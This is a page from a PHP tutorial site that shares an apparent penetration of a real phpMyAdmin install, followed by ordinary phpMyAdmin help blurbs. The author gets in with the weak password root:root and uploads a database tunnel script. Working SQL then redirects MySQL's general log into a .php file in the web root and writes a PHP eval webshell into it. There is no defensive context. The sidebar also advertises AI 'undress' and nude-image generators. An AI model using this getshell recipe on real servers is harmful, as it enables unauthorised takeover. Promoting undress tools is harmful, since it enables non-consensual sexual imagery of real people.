Share a penetration test by Phpmyadmin
The following is a penetration test of Phpmyadmin from the tutorial column of phpmyadmin. I hope it will be helpful to friends in need!
First scan a certain site through directory scanning and find that phpmyadmin exists. Try the weak password root: root is lucky to get in
##Try to use When Navicate connects to the database, it returns that remote connection to the database is prohibited:
However, the remote command execution found that the local 3306 port was open, so it tried to connect through a proxy:
Upload the ntunnel_mysql.php file (database proxy script) in the Navicat installation directory to any web site directory on the target server (uploaded later after getshell)
Upload to the D:/phpStudy/WWW directory to access http://XXX/ntunnel_mysql.php Test successful
Phpmyadmin Get Shell:
Use log filesmysql version 5.0 or above will create log files and modify the global log file Variables can also be used with getshell. But you must also have read and write permissions on the generated logs.set global general_log = "ON"; #当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成进而getshell SET global general_log_file='D:/phpStudy/WWW/test1234.php'; #对应就会生成test1234.php文件 select '<?php eval($_POST[2019]);?>'; #将一句话木马写入test1234.php文件
The above is the detailed content of Share a penetration test by Phpmyadmin. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1377
52
How to set primary key in phpmyadmin
Apr 07, 2024 pm 02:54 PM
The primary key of a table is one or more columns that uniquely identify each record in the table. Here are the steps to set a primary key: Log in to phpMyAdmin. Select database and table. Check the column you want to use as the primary key. Click "Save Changes". Primary keys provide data integrity, lookup speed, and relationship modeling benefits.
How to add foreign keys in phpmyadmin
Apr 07, 2024 pm 02:36 PM
Adding a foreign key in phpMyAdmin can be achieved by following these steps: Select the parent table that contains the foreign key. Edit the parent table structure and add new columns in "Columns". Enable foreign key constraints and select the referencing table and key. Set update/delete operations. save Changes.
Where is the phpmyadmin log?
Apr 07, 2024 pm 12:57 PM
Default location for PHPMyAdmin log files: Linux/Unix/macOS:/var/log/phpmyadminWindows: C:\xampp\phpMyAdmin\logs\ Log file purpose: Troubleshooting Audit Security
Where does the wordpress database exist?
Apr 15, 2024 pm 10:39 PM
The WordPress database is housed in a MySQL database that stores all website data and can be accessed through your hosting provider’s dashboard, FTP, or phpMyAdmin. The database name is related to the website URL or username, and access requires the use of database credentials, including name, username, password, and hostname, which are typically stored in the "wp-config.php" file.
What is the password for the phpmyadmin account?
Apr 07, 2024 pm 01:09 PM
The default username and password for PHPMyAdmin are root and empty. For security reasons, it is recommended to change the default password. Method to change password: 1. Log in to PHPMyAdmin; 2. Select "privileges"; 3. Enter the new password and save it. When you forget your password, you can reset it by stopping the MySQL service and editing the configuration file: 1. Add the skip-grant-tables line; 2. Log in to the MySQL command line and reset the root password; 3. Refresh the permission table; 4. Delete skip-grant-tables line, restart the MySQL service.
How to delete data table in phpmyadmin
Apr 07, 2024 pm 03:00 PM
Steps to delete a data table in phpMyAdmin: Select the database and data table; click the "Action" tab; select the "Delete" option; confirm and perform the deletion operation.
why phpmyadmin access denied
Apr 07, 2024 pm 01:03 PM
Reasons and solutions for access denied by phpMyAdmin: Authentication failed: Check whether the username and password are correct. Server configuration error: adjust firewall settings and check whether the database port is correct. Permissions issue: Granting users access to the database. Session timeout: Refresh the browser page and reconnect. phpMyAdmin configuration error: Check the configuration file and file permissions to make sure the required Apache modules are enabled. Server issue: Wait for a while and try again or contact your hosting provider.
What kind of vulnerability does the phpmyadmin vulnerability belong to?
Apr 07, 2024 pm 01:36 PM
phpMyAdmin is susceptible to multiple vulnerabilities, including: 1. SQL injection vulnerability; 2. Cross-site scripting (XSS) vulnerability; 3. Remote code execution (RCE) vulnerability; 4. Local file inclusion (LFI) vulnerability; 5. Information disclosure Vulnerability; 6. Privilege escalation vulnerability.
